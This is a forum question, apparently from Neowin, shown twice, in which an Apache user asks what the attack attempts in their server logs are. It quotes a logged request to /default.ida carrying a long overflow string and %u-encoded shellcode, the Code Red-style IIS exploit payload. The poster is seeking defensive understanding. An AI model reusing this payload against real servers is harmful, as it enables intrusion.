I'm not using IIS, but I am using Apache. When I read the logs, I found around 6mb of hacking info....Some guy even tried to some sort of new type of vulnerability by trying to post a program (around 1mb!!)to an example script (for IIS im guessing). The most common hack I get is:
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
Anyways, one person tried some pretty weird things, i am including a text file that is part of the Apache log. If anybody can tell me what they were doing, i would greatly appreciate it.
Question
zivan56
I'm not using IIS, but I am using Apache. When I read the logs, I found around 6mb of hacking info....Some guy even tried to some sort of new type of vulnerability by trying to post a program (around 1mb!!)to an example script (for IIS im guessing). The most common hack I get is:
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
Anyways, one person tried some pretty weird things, i am including a text file that is part of the Apache log. If anybody can tell me what they were doing, i would greatly appreciate it.
Link to comment
https://www.neowin.net/forum/topic/2232-apache-or-iis-hack/Share on other sites
4 answers to this question
Recommended Posts